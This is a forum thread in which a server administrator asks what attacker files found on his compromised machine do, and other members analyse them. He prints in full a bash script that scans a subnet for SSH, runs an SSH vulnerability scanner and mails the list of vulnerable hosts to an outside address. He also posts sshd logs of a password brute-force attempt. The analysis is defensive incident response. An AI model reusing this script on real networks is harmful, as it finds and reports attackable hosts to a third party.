Results 1 to 6 of 6
  1. #1
    Join Date
    Apr 2004
    Location
    India
    Posts
    292

    What dose this rootkit do?

    Hi Guys,
    I found a rootkit named "psybnc" alomg with the ssh folder wich has lots of scripts inside ...
    I opened some scripts ..they have IPs in my subnet.....
    Like a script inside has following code...
    -------------------------------------------------------------
    #!/bin/bash
    if [ $# != 1 ]; then
    echo " usage: $0 <b class>"
    exit;
    fi



    echo " Versiune de scaner privata!"
    echo "----------------------------------------------------"
    echo " All my love for PIZDE "
    echo "----------------------------------------------------"
    echo "# incep scanarea Morpheuse..."
    ./pscan2 $1 22

    sleep 10
    cat $1.pscan.22 |sort |uniq > mfu.txt
    oopsnr2=`grep -c . mfu.txt`
    echo "# Am gasit $oopsnr2 de servere"
    echo "----------------------------------------"
    echo "# Incepem Sa Terminam ..."
    ./ssh-scan 50
    cat vuln.txt | mail -s "Dosare root" [email protected]
    rm -rf $1.pscan.22 mfu.txt
    echo "Asta a fost tot"
    --------------------------------------------------------------------------

    I need to know is it someting a SSH rootkit ...or else...

    Thanks in advance...
    Last edited by atul; 05-24-2005 at 07:19 AM.
    thelinophile
    Thinking Different !!

  2. #2
    Join Date
    Oct 2004
    Location
    India
    Posts
    80
    Though, psybnc is a irc bouncer, the code that you pasted is a old ssh vulnerability scanner. It will scan the subnet for the vulnerable hosts and will mail it to the mail id that is there in the code.
    AssuredHost.Com
    Secured Shared and Reseller Web hosting Solutions
    We Host Your Trust

  3. #3
    i had this bookmarked, its a little old but gives you a start

    http://www.jestrix.net/tuts/psy.html

  4. #4
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hi guys,
    Thanks for info.....
    Actaully I am attaching the whole rootkit material as well the related material I could find out....
    Is there anyway to know the things more about....like entry point...? I guess he might have used wget... ? Or a mail....?
    I am not sure....
    But please go through the attached material for ur more info...
    Thanks..
    thelinophile
    Thinking Different !!

  5. #5
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hi
    I found more to it...
    There is file inside those material which has ..this ..
    -----------------------------------------------------------------------------------
    May 22 09:45:55 brlinux sshd[24183]: Did not receive identification string from ::ffff:219.237.243.240
    May 22 09:58:21 brlinux sshd[26717]: Failed password for nobody from ::ffff:219.237.243.240 port 60263 ssh2
    May 22 09:58:24 brlinux sshd[26719]: Invalid user patrick from ::ffff:219.237.243.240
    May 22 09:58:26 brlinux sshd[26719]: Failed password for invalid user patrick from ::ffff:219.237.243.240 port 60330 ssh2
    May 22 09:58:29 brlinux sshd[26721]: Invalid user patrick from ::ffff:219.237.243.240
    May 22 09:58:31 brlinux sshd[26721]: Failed password for invalid user patrick from ::ffff:219.237.243.240 port 60391 ssh2
    May 22 09:58:36 brlinux sshd[26723]: Failed password for root from ::ffff:219.237.243.240 port 60452 ssh2
    May 22 09:58:42 brlinux sshd[26725]: Failed password for root from ::ffff:219.237.243.240 port 60516 ssh2
    May 22 09:58:47 brlinux sshd[26727]: Failed password for root from ::ffff:219.237.243.240 port 60574 ssh2
    May 22 09:58:52 brlinux sshd[26729]: Failed password for root from ::ffff:219.237.243.240 port 60642 ssh2
    May 22 09:58:57 brlinux sshd[26731]: Failed password for root from ::ffff:219.237.243.240 port 60709 ssh2
    May 22 09:59:00 brlinux sshd[26733]: Invalid user rolo from ::ffff:219.237.243.240
    May 22 09:59:02 brlinux sshd[26733]: Failed password for invalid user rolo from ::ffff:219.237.243.240 port 60764 ssh2
    May 22 09:59:05 brlinux sshd[26735]: Invalid user iceuser from ::ffff:219.237.243.240
    May 22 09:59:07 brlinux sshd[26735]: Failed password for invalid user iceuser from ::ffff:219.237.243.240 port 60823 ssh2
    May 22 09:59:10 brlinux sshd[26737]: Invalid user horde from ::ffff:219.237.243.240
    May 22 09:59:13 brlinux sshd[26737]: Failed password for invalid user horde from ::ffff:219.237.243.240 port 60876 ssh2
    May 22 09:59:15 brlinux sshd[26740]: Invalid user cyrus from ::ffff:219.237.243.240
    May 22 09:59:18 brlinux sshd[26740]: Failed password for invalid user cyrus from ::ffff:219.237.243.240 port 60935 ssh2
    May 22 09:59:21 brlinux sshd[26742]: Invalid user www from ::ffff:219.237.243.240
    May 22 09:59:23 brlinux sshd[26742]: Failed password for invalid user www from ::ffff:219.237.243.240 port 60999 ssh2
    May 22 09:59:26 brlinux sshd[26744]: Invalid user wwwrun from ::ffff:219.237.243.240
    May 22 09:59:28 brlinux sshd[26744]: Failed password for invalid user wwwrun from ::ffff:219.237.243.240 port 32838 ssh2
    May 22 09:59:31 brlinux sshd[26746]: Invalid user matt from ::ffff:219.237.243.240
    May 22 09:59:33 brlinux sshd[26746]: Failed password for invalid user matt from ::ffff:219.237.243.240 port 32900 ssh2
    May 22 09:59:36 brlinux sshd[26758]: Invalid user test from ::ffff:219.237.243.240
    May 22 09:59:39 brlinux sshd[26758]: Failed password for invalid user test from ::ffff:219.237.243.240 port 32961 ssh2
    May 22 09:59:41 brlinux sshd[26760]: Invalid user test from ::ffff:219.237.243.240

    -----------------------------------------------------------------------------------
    Now it seems that the hacker tried to Brute Force with User IDs and Passwd ...
    He is having a good precomplied list of user ids and passwd ....
    and he tried that...

    So it is ....a combination of.....IRC Bounce.... a old SSH vuln scanner...and a BFD,..
    Cleaver...
    thelinophile
    Thinking Different !!

  6. #6
    Join Date
    Jun 2003
    Posts
    961
    Originally posted by atul

    <snip>
    echo "# incep scanarea Morpheuse..."
    ./pscan2 $1 22

    sleep 10
    cat $1.pscan.22 |sort |uniq > mfu.txt
    oopsnr2=`grep -c . mfu.txt`
    echo "# Am gasit $oopsnr2 de servere"
    echo "----------------------------------------"
    echo "# Incepem Sa Terminam ..."
    ./ssh-scan 50
    cat vuln.txt | mail -s "Dosare root" [email protected]
    rm -rf $1.pscan.22 mfu.txt
    echo "Asta a fost tot"
    <snip>
    So it is ....a combination of.....IRC Bounce.... a old SSH vuln scanner...and a BFD,..
    Cleaver...
    actually no
    the script is just named "psybnc", it does not have anything in common with the irc bouncer. It is only a ssh vuln scanner,
    scans for ips and runs ssh-scan on them, then emails results to the email address

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •